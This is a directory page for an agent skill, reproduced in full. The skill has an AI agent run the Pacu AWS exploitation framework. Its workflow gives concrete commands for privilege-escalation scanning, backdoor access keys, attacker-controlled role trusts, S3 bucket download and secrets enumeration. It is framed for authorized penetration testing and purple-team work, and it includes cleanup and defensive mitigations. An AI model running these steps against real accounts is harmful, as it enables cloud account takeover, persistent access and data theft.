Agent skill

Exploiting AWS With Pacu

by mukul975 in mukul975/Anthropic-Cybersecurity-Skills

Runs the Pacu AWS exploitation framework end-to-end — session and credential setup, IAM enumeration, automated privilege-escalation scanning via iamprivescscan, and persistence/backdooring modules…

Apache-2.0Auto-check: warningsSecurity

Install Exploiting AWS With Pacu

The automated check flagged lines worth reading first. See the safety section below.

skills CLI
$ npx skills add mukul975/Anthropic-Cybersecurity-Skills --skill exploiting-aws-with-pacu -a claude-code

Project install by default; add -g for ~/.claude/skills/.

GitHub CLI
$ gh skill install mukul975/Anthropic-Cybersecurity-Skills exploiting-aws-with-pacu --agent claude-code

Project scope by default; add --scope user for a personal install. Needs GitHub CLI 2.90.0 or later (public preview).

Manual copy
$ git clone --depth 1 https://github.com/mukul975/Anthropic-Cybersecurity-Skills.git skills-src && mkdir -p .claude/skills && cp -r skills-src/skills/exploiting-aws-with-pacu .claude/skills/exploiting-aws-with-pacu && rm -rf skills-src

Use ~/.claude/skills/ instead of .claude/skills for a personal install. The folder must contain SKILL.md.

Claude Code skills documentation · loads skills from .claude/skills/

Facts

Skill name
exploiting-aws-with-pacu
GitHub stars
34k
Token cost
~2.6k tokens
SKILL.md length
884 words
Files
5 (incl. scripts, references)
Skills in repo
644
Repo updated
First seen
Licence
Apache-2.0

At a glance

Runs the Pacu AWS exploitation framework end-to-end — session and credential setup, IAM enumeration, automated privilege-escalation scanning via iamprivescscan, and persistence/backdooring modules…

  • Works in 9 steps: Launch Pacu and create a session → Confirm the identity you are operating as → Enumerate IAM entities and the… → …
  • Authorized AWS penetration tests
  • SKILL.md covers Overview, When to Use, Prerequisites and Objectives, plus 7 more sections
  • Runs Python scripts from its folder; calls aws, python3 and pipx; reaches github.com

What it does

Exploiting AWS With Pacu is an agent skill from mukul975/Anthropic-Cybersecurity-Skills. Runs the Pacu AWS exploitation framework end-to-end — session and credential setup, IAM enumeration, automated privilege-escalation scanning via iamprivescscan, and persistence/backdooring modules like iambackdooruserskeys. Use for authorized AWS penetration tests or red-team engagements, assessing blast radius from a compromised IAM credential, or generating attacker telemetry for purple-team detection testing.

Its SKILL.md is about 2.6k tokens, which your agent loads only when the skill is triggered. The skill folder holds 6 other files, including scripts and reference files (for example `references/api-reference.md`, `references/standards.md` and `scripts/agent.py`).

It sits in Security, covering Red teaming and adversary simulation and Penetration testing. It works with Amazon Web Services. The repository describes itself as: 817 structured cybersecurity skills for AI agents · Mapped to 6 frameworks: MITRE ATT&CK, NIST CSF 2.0, MITRE ATLAS, D3FEND, NIST AI RMF & MITRE F3 (Fight Fraud) · agentskills.io…. The licence is Apache-2.0.

When your agent uses it

  • Authorized AWS penetration tests
  • Red-team engagements
  • Assessing blast radius from a compromised IAM credential
  • Generating attacker telemetry for purple-team detection testing

Example prompts

  • “/exploiting-aws-with-pacu”

Requirements

  • Python 3
  • Docker

Workflow steps

9 steps, taken from the step headings in SKILL.md.

  1. Launch Pacu and create a session
  2. Confirm the identity you are operating as
  3. Enumerate IAM entities and the compromised principal's permissions
  4. Scan for privilege-escalation paths
  5. Establish persistence with a backdoor access key
  6. Enumerate compute and storage
  7. Harvest secrets
  8. Non-interactive execution (CI / scripted)
  9. Export findings and clean up

What it can do on your machine

Read from SKILL.md and the folder at commit 54a7988. It shows what the files ask for, not the result of running them.

  • Tool permissions

    Pre-approves nothing: there is no allowed-tools line, so your agent's usual permission prompts apply.

    From allowed-tools in the SKILL.md frontmatter.

  • Runs code

    Ships 1 file in scripts/ (Python), which the agent can run.

    Shell commands in SKILL.md call:

    • aws
    • python3
    • pipx
    • docker

    From the folder's file list and the shell code blocks in SKILL.md.

  • Network

    Hosts in commands or code, which the agent is likely to contact:

    • github.com

    Also links to:

    • rhinosecuritylabs.com
    • docs.aws.amazon.com

    From URLs in SKILL.md, links to its own repository left out.

  • Credentials

    Names no API keys, tokens, secrets or passwords.

    From names ending in _API_KEY, _TOKEN, _SECRET, _KEY or _PASSWORD in SKILL.md.

Context cost

Exploiting AWS With Pacu loads about 2.6k tokens when it runs, and up to ~3.6k if it reads all its reference files. Until then it costs about 112 tokens; SKILL.md has 884 words of instructions outside code blocks.

Always · name and description, kept in context so the agent knows when to use it
~112
When it runs · the whole SKILL.md, loaded when a task matches
~2.6k
With references · SKILL.md plus every file in references/, read only if the agent opens them
~3.6k

Estimates: characters ÷ 4, the usual rule of thumb; real counts depend on the model's tokenizer. Scripts and assets cost tokens only if the agent reads them.

Safety

Auto-check: warnings

The automated check found patterns that need a careful read before installing.

  • WarningMentions a credentials file (SSH keys, cloud or package-manager tokens)SKILL.md:37
    with `set_keys` or by importing from `~/.aws/credentials`), confirm the identity with `whoami`, then enumerate IAM and t

Automated static check — not a guarantee. Review scripts before installing. It scans the text of SKILL.md for risky patterns (piping downloads into a shell, reading credential files, hidden Unicode, destructive commands); the scripts in this folder are not scanned.

SKILL.md

The full file from mukul975/Anthropic-Cybersecurity-Skills at commit 54a7988, republished under its Apache-2.0 licence (© mukul975). 884 words, ~2,607 tokens.

Download SKILL.mdSave it as .claude/skills/exploiting-aws-with-pacu/SKILL.md (or your agent's skills folder). This skill also uses 4 other files; get the full folder from GitHub.
name
exploiting-aws-with-pacu
description
Runs the Pacu AWS exploitation framework end-to-end — session and credential setup, IAM enumeration, automated privilege-escalation scanning via iam__privesc_scan, and persistence/backdooring modules like iam__backdoor_users_keys. Use for authorized AWS penetration tests or red-team engagements, assessing blast radius from a compromised IAM credential, or generating attacker telemetry for purple-team detection testing.
domain
cybersecurity
subdomain
cloud-security
tags
pacu, aws, cloud-pentest, privilege-escalation, persistence, iam-abuse, offensive-security, red-team
version
1.0
author
mahipal
license
Apache-2.0
nist_csf
PR.AA-05
mitre_attack
T1078.004

Exploiting AWS with Pacu

Legal Notice: This skill is for authorized penetration testing and educational purposes only. Pacu performs active enumeration, privilege escalation, persistence, and backdooring against live AWS accounts. Run it ONLY against accounts you own or have explicit written authorization (scope/Rules of Engagement) to test. Many modules create durable changes (new IAM users, access keys, policies); track and remove everything. Unauthorized use is illegal under the CFAA and equivalent laws.

Overview

Pacu is the open-source AWS exploitation framework from Rhino Security Labs. It is the cloud-pentest analogue of Metasploit: a modular Python console that manages target sessions, enumerates an AWS account, identifies privilege-escalation paths, and executes persistence/backdooring/exfiltration modules — all backed by a local SQLite database that records every enumerated resource so modules can chain off one another's findings.

A Pacu engagement follows a consistent arc. You create a named session, load AWS keys (with set_keys or by importing from ~/.aws/credentials), confirm the identity with whoami, then enumerate IAM and the rest of the account. The flagship workflow is iam__enum_permissions followed by iam__privesc_scan, which checks the compromised principal against ~20 known AWS IAM privilege-escalation primitives (e.g. iam:CreatePolicyVersion, iam:AttachUserPolicy, iam:PassRole + lambda:CreateFunction, sts:AssumeRole) and can auto-exploit them. Persistence modules such as iam__backdoor_users_keys mint a second access key on an existing user, and iam__backdoor_assume_role adds a trust to a role so the attacker can assume it later.

This skill covers installing Pacu, session and credential management, IAM enumeration, automated privilege-escalation scanning and exploitation, persistence/backdooring, and data access — every command and module name verified against the Rhino Security Labs project. Source: github.com/RhinoSecurityLabs/pacu.

When to Use

  • Conducting an authorized AWS cloud penetration test or red-team engagement
  • Assessing the blast radius of a single compromised IAM credential (privesc scanning)
  • Demonstrating persistence/backdoor techniques to drive remediation
  • Generating realistic attacker telemetry to test cloud detections (purple team)
  • Mapping an unfamiliar AWS account's IAM, EC2, S3, and Lambda exposure

Prerequisites

  • Pacu installed:
    bash
    python3 -m pip install -U pip
    python3 -m pip install -U pacu     # then run: pacu
    # or, preferred on Kali, with pipx:
    pipx install git+https://github.com/RhinoSecurityLabs/pacu.git
    # or Docker:
    docker run -it rhinosecuritylabs/pacu:latest
  • AWS access key/secret (and optional session token) for the in-scope target principal
  • A signed authorization / Rules of Engagement document defining scope
  • Python 3.9+ and outbound HTTPS to AWS API endpoints
  • AWS CLI installed for verification (aws sts get-caller-identity)

Objectives

  • Install Pacu and create an isolated engagement session
  • Load and validate target AWS credentials
  • Enumerate IAM permissions for the compromised principal
  • Identify and (where authorized) exploit privilege-escalation paths
  • Establish persistence via backdoor access keys and role trusts
  • Enumerate and access data in EC2, S3, and Secrets Manager
  • Export findings for reporting and ensure all artifacts are removed

MITRE ATT&CK Mapping

IDNameUse in this skill
T1078.004Valid Accounts: Cloud AccountsPacu operates as a valid AWS principal and abuses its permissions
T1098.001Account Manipulation: Additional Cloud Credentialsiam__backdoor_users_keys mints a second access key
T1098.003Account Manipulation: Additional Cloud Rolesiam__backdoor_assume_role / privesc via role policy changes
T1580Cloud Infrastructure Discoveryec2__enum, iam__enum_users_roles_policies_groups
T1530Data from Cloud Storages3__download_bucket retrieves S3 objects
T1552.005Unsecured Credentials: Cloud Instance Metadata APIEC2 IMDS credential abuse

Workflow

1. Launch Pacu and create a session
bash
pacu
# In the Pacu console:
Pacu> set_keys
#   key alias  : engagement-target
#   access key : AKIA...
#   secret key : ...
#   session tok: (optional)
2. Confirm the identity you are operating as
text
Pacu> whoami
Pacu> run aws sts get-caller-identity     # or, outside Pacu: aws sts get-caller-identity
3. Enumerate IAM entities and the compromised principal's permissions
text
Pacu> run iam__enum_users_roles_policies_groups
Pacu> run iam__enum_permissions
Pacu> data IAM            # review what was collected into the session DB
Show full SKILL.md (374 more words)Show less
4. Scan for privilege-escalation paths

iam__privesc_scan checks the principal against known AWS privesc primitives and lists viable methods.

text
Pacu> run iam__privesc_scan
# To attempt automated exploitation of a discovered method:
Pacu> run iam__privesc_scan --offline      # analyze without making changes
5. Establish persistence with a backdoor access key
text
Pacu> run iam__backdoor_users_keys --usernames target-user
# Add an assumable-role trust for long-term access:
Pacu> run iam__backdoor_assume_role --role-names target-role --user-arns arn:aws:iam::111122223333:user/attacker
6. Enumerate compute and storage
text
Pacu> run ec2__enum
Pacu> run s3__download_bucket --names target-bucket
Pacu> data S3
7. Harvest secrets
text
Pacu> run secrets__enum
8. Non-interactive execution (CI / scripted)

Pacu supports one-shot module execution from the shell.

bash
pacu --session engagement --module-name iam__enum_users_roles_policies_groups --exec
pacu --session engagement --module-name s3__download_bucket \
     --module-args "--names target-bucket" --exec
9. Export findings and clean up
text
Pacu> data all > /dev/stdout         # review collected data
# Manually remove every backdoor created (record ARNs/key IDs first):
bash
aws iam delete-access-key --user-name target-user --access-key-id AKIA_BACKDOOR
aws iam update-assume-role-policy --role-name target-role --policy-document file://original-trust.json

See scripts/agent.py to drive the enumerate->privesc flow non-interactively.

Tools and Resources

ResourcePurposeLink
Pacu GitHubSource, modules, wikihttps://github.com/RhinoSecurityLabs/pacu
Pacu module listPer-module documentationhttps://github.com/RhinoSecurityLabs/pacu/wiki/Module-Details
Rhino AWS privesc researchThe privesc primitives iam__privesc_scan checkshttps://rhinosecuritylabs.com/aws/aws-privilege-escalation-methods-mitigation/
AWS IAM docsPermission and policy referencehttps://docs.aws.amazon.com/IAM/latest/UserGuide/
CloudGoatVulnerable AWS lab to practice safelyhttps://github.com/RhinoSecurityLabs/cloudgoat

OPSEC and Detection Considerations

Pacu modules are noisy and durable; an operator must plan for both detection and cleanup:

  • iam__enum_permissions and iam__enum_users_roles_policies_groups generate a large burst of iam:List*/iam:Get* calls visible in CloudTrail and GuardDuty (Discovery:IAMUser/AnomalousBehavior).
  • iam__privesc_scan in non-offline mode can make state-changing calls (iam:CreatePolicyVersion, iam:AttachUserPolicy); use --offline for analysis only.
  • iam__backdoor_users_keys triggers iam:CreateAccessKey, and iam__backdoor_assume_role triggers iam:UpdateAssumeRolePolicy — both are high-signal persistence indicators that defenders alert on.
  • Record every artifact ID (access keys, policy versions, role-trust changes) so each can be reverted; orphaned backdoors are both an OPSEC failure and a real risk to the client.

Defensive Mitigations to Recommend

FindingRemediation
Over-permissive IAM principal (privesc path)Apply least privilege; scope iam:PassRole with conditions
iam:CreatePolicyVersion / SetDefaultPolicyVersion allowedRemove from non-admin roles
Long-lived access keysEnforce key rotation; prefer roles / short-lived STS creds
No detection on key creationAlert on CreateAccessKey / UpdateAssumeRolePolicy in CloudTrail

Key Module Reference

ModulePurpose
iam__enum_users_roles_policies_groupsEnumerate all IAM principals and policies
iam__enum_permissionsResolve the current principal's effective permissions
iam__privesc_scanIdentify (and optionally exploit) privesc paths
iam__backdoor_users_keysCreate a backdoor access key on a user
iam__backdoor_assume_roleAdd an attacker-controlled trust to a role
ec2__enumEnumerate EC2 instances, volumes, snapshots
s3__download_bucketDownload objects from an S3 bucket
secrets__enumEnumerate Secrets Manager / SSM parameters

Validation Criteria

  • Pacu installed and console launches
  • Engagement session created and keys loaded
  • Identity confirmed with whoami / sts get-caller-identity
  • IAM entities and current-principal permissions enumerated
  • iam__privesc_scan run and viable paths documented
  • Persistence module behavior demonstrated (in authorized scope)
  • EC2/S3/secrets enumeration completed
  • All created backdoors (keys, role trusts, policies) recorded and removed
  • Findings exported for the engagement report
  • No residual attacker artifacts remain in the account

© mukul975, Apache-2.0. Rendered from Markdown: HTML in the file is shown as text, images as links, and headings moved down two levels. Raw file

Files

SKILL.md and 4 other files (scripts, references) in skills/exploiting-aws-with-pacu of mukul975/Anthropic-Cybersecurity-Skills.

  • SKILL.md
  • LICENSE
  • references/api-reference.md
  • references/standards.md
  • scripts/agent.py

Open the folder on GitHubat commit 54a7988

Compare with similar skills

Exploiting AWS With Pacu next to the 5 skills that share the most tags, products or categories with it. Stars are the repository's; “used in” counts other GitHub owners with a copy.

Exploiting AWS With Pacu compared with similar skills
SkillStarsUsed inTokensAuto-checkLicenceRepo updated
Exploiting AWS With Pacu this skillmukul975/Anthropic-Cybersecurity-Skills34k—~2.6kAutomated safety check: WarnApache-2.0
Remediating With AWS Security Agentaws/agent-toolkit-for-aws2.8k—~2.9kAutomated safety check: PassApache-2.0
Cloud Defensetransilienceai/communitytools563—~476Automated safety check: PassMIT
Investigating AWS Incidentstrilwu/secskills157—~4.8kAutomated safety check: PassMIT
Rds Db2aws/agent-toolkit-for-aws2.8k—~6.9kAutomated safety check: PassApache-2.0
Ad Environment ConstraintsADScanPro/Claude-AD211—~2.9kAutomated safety check: NotesMIT

Similar skills

  • Remediating With AWS Security Agent

    aws/agent-toolkit-for-aws

    Official

    Pull AWS Security Agent findings (penetration tests and code reviews) and drive remediation.

    2.8k GitHub stars~2.9k tokensUpdated today
    SecurityAuto-check passed
  • Cloud Defense

    transilienceai/communitytools

    Detect and break the cloud post-compromise attack chain (AWS / Azure / GCP) — per-stage CloudTrail / Activity-Log / Audit-Log detection signals and the preventive controls that close each step.

    563 GitHub stars~476 tokensUpdated 2 mo ago
    SecurityAuto-check passed
  • Investigate security incidents in Amazon Web Services -- reconstruct attacker activity from CloudTrail, VPC Flow Logs, and GuardDuty, anchor the investigation on the compromised principal (access…

    157 GitHub stars~4.8k tokensUpdated 1 mo ago
    SecurityAuto-check passed
  • Rds Db2

    aws/agent-toolkit-for-aws

    Official

    Provisions, connects, migrates, and operates Amazon RDS for Db2.

    2.8k GitHub stars~6.9k tokensUpdated today
    SecurityAuto-check passed
  • Ad Environment Constraints

    ADScanPro/Claude-AD

    Real-world Active Directory environment constraints that silently break attacks when ignored: NTLM disabled (Kerberos fallback), AES-only KDCs (RC4 blocked by GPO), LDAP signing and channel binding…

    211 GitHub stars~2.9k tokensUpdated 1 mo ago
    SecurityAuto-check: notes
  • Cloud Audit

    CommonHuman-Lab/nyxstrike

    Cloud and container security auditing workflow using prowler, trivy, kube-hunter, and docker-bench for AWS, GCP, Azure, Kubernetes, and container images

    157 GitHub stars~1.1k tokensUpdated today
    DevOps & CloudAuto-check passed

More from mukul975/Anthropic-Cybersecurity-Skills

All 644 skills in this repo
  • Campaign Attribution Evidence Analysis

    mukul975/Anthropic-Cybersecurity-Skills

    Weighs infrastructure, TTP, malware code and timing evidence with the Diamond Model and competing hypotheses to reach a confidence-rated attribution.

    34k GitHub stars~2.3k tokensUpdated 1 mo ago
    Auto-check passed
  • Go Malware Analysis in Ghidra

    mukul975/Anthropic-Cybersecurity-Skills

    Walks through reverse engineering Go-compiled malware in Ghidra: parsing buildinfo and pclntab, recovering stripped function names and extracting dependencies.

    34k GitHub stars~2.8k tokensUpdated 1 mo ago
    Auto-check passed
  • LNK and Jump List Forensics

    mukul975/Anthropic-Cybersecurity-Skills

    Guides forensic analysis of Windows LNK shortcut files and Jump Lists with LECmd, JLECmd and manual parsing to show file access and program execution.

    34k GitHub stars~2.8k tokensUpdated 1 mo ago
    Auto-check passed
  • Malware Persistence Analysis with Autoruns

    mukul975/Anthropic-Cybersecurity-Skills

    Hunts Windows malware persistence with Sysinternals Autoruns, covering run keys, services, scheduled tasks and drivers, with baseline comparison.

    34k GitHub stars~1.2k tokensUpdated 1 mo ago
    Auto-check passed
  • NTFS MFT Deleted File Recovery

    mukul975/Anthropic-Cybersecurity-Skills

    Guides a Windows forensic examination of the NTFS Master File Table to recover deleted-file evidence, build timelines and spot timestomping.

    34k GitHub stars~2.7k tokensUpdated 1 mo ago
    Auto-check passed
  • Network Covert Channel Analysis

    mukul975/Anthropic-Cybersecurity-Skills

    Detects DNS tunneling, ICMP exfiltration and HTTP-based covert channels in packet captures and DNS logs when hunting for hidden command-and-control traffic.

    34k GitHub stars~2k tokensUpdated 1 mo ago
    Auto-check passed

Categories

Questions about Exploiting AWS With Pacu

What does Exploiting AWS With Pacu do?

Runs the Pacu AWS exploitation framework end-to-end — session and credential setup, IAM enumeration, automated privilege-escalation scanning via iamprivescscan, and persistence/backdooring modules…. Exploiting AWS With Pacu is an agent skill from mukul975/Anthropic-Cybersecurity-Skills. Runs the Pacu AWS exploitation framework end-to-end — session and credential setup, IAM enumeration, automated privilege-escalation scanning via iamprivescscan, and persistence/backdooring modules like iambackdooruserskeys.

When should I use Exploiting AWS With Pacu?

Exploiting AWS With Pacu fits situations like: authorized AWS penetration tests; red-team engagements; assessing blast radius from a compromised IAM credential; generating attacker telemetry for purple-team detection testing.

How do I install Exploiting AWS With Pacu in Claude Code?

Run `npx skills add mukul975/Anthropic-Cybersecurity-Skills --skill exploiting-aws-with-pacu -a claude-code`. Or copy the skill folder (skills/exploiting-aws-with-pacu in mukul975/Anthropic-Cybersecurity-Skills) into .claude/skills/exploiting-aws-with-pacu in your project. Claude Code loads it when a task matches its description.

How do I install Exploiting AWS With Pacu in Codex?

Run `npx skills add mukul975/Anthropic-Cybersecurity-Skills --skill exploiting-aws-with-pacu -a codex`. Or copy the skill folder (skills/exploiting-aws-with-pacu in mukul975/Anthropic-Cybersecurity-Skills) into .agents/skills/exploiting-aws-with-pacu in your project. Codex loads it when a task matches its description.

Can I use Exploiting AWS With Pacu in Cursor, Gemini CLI or GitHub Copilot?

Cursor, Gemini CLI, GitHub Copilot and OpenCode also load SKILL.md folders. With the skills CLI, run `npx skills add mukul975/Anthropic-Cybersecurity-Skills --skill exploiting-aws-with-pacu -a cursor` (or -a gemini-cli, github-copilot or opencode for the others). To copy it by hand, put the folder in .cursor/skills/exploiting-aws-with-pacu, .gemini/skills/exploiting-aws-with-pacu, .github/skills/exploiting-aws-with-pacu and .opencode/skills/exploiting-aws-with-pacu in your project.

What does Exploiting AWS With Pacu need to run?

Going by SKILL.md and its folder, Exploiting AWS With Pacu needs Python for the scripts in its folder and the command-line tools its instructions call (aws, python3, pipx and docker). Our summary lists: Python 3; Docker.

Does Exploiting AWS With Pacu access the network?

SKILL.md names 3 domains. In commands or code: github.com; the agent is likely to contact it when it follows the instructions. As links in the text: rhinosecuritylabs.com and docs.aws.amazon.com. This is read from the text; nothing was executed.

Is Exploiting AWS With Pacu safe to install?

Our automated static check of SKILL.md flagged 1 warning(s): mentions a credentials file (ssh keys, cloud or package-manager tokens). Read the flagged lines before installing; the check is not a guarantee either way. The check reads SKILL.md only: the scripts in the folder are not scanned, so read them before running anything.

What licence does Exploiting AWS With Pacu use?

Exploiting AWS With Pacu is published under the Apache-2.0 licence (declared in SKILL.md). It allows redistribution, so the full SKILL.md is shown on this page.

How many tokens does Exploiting AWS With Pacu use?

About 2.6k tokens (SKILL.md is roughly 10k characters). Agents keep only the skill's name and description in context until a task matches; then they load SKILL.md in full. Its references folder adds about 969 tokens, read only when the agent opens those files.

What are the alternatives to Exploiting AWS With Pacu?

Skills that share tags, products or a category with Exploiting AWS With Pacu: Remediating With AWS Security Agent (aws/agent-toolkit-for-aws, 2.8k stars), Cloud Defense (transilienceai/communitytools, 563 stars), Investigating AWS Incidents (trilwu/secskills, 157 stars) and Rds Db2 (aws/agent-toolkit-for-aws, 2.8k stars). The comparison table on this page puts their stars, adoption, token cost, safety result and licence side by side.

Who maintains Exploiting AWS With Pacu?

mukul975 (a GitHub user) maintains it in mukul975/Anthropic-Cybersecurity-Skills, which has 34,116 GitHub stars. The repository holds 644 skills in this directory. The repository was last updated on August 31, 2026.

Source: mukul975/Anthropic-Cybersecurity-Skills on GitHub. Facts on this page come from the repository at the commit we read; the author's words are quoted as theirs.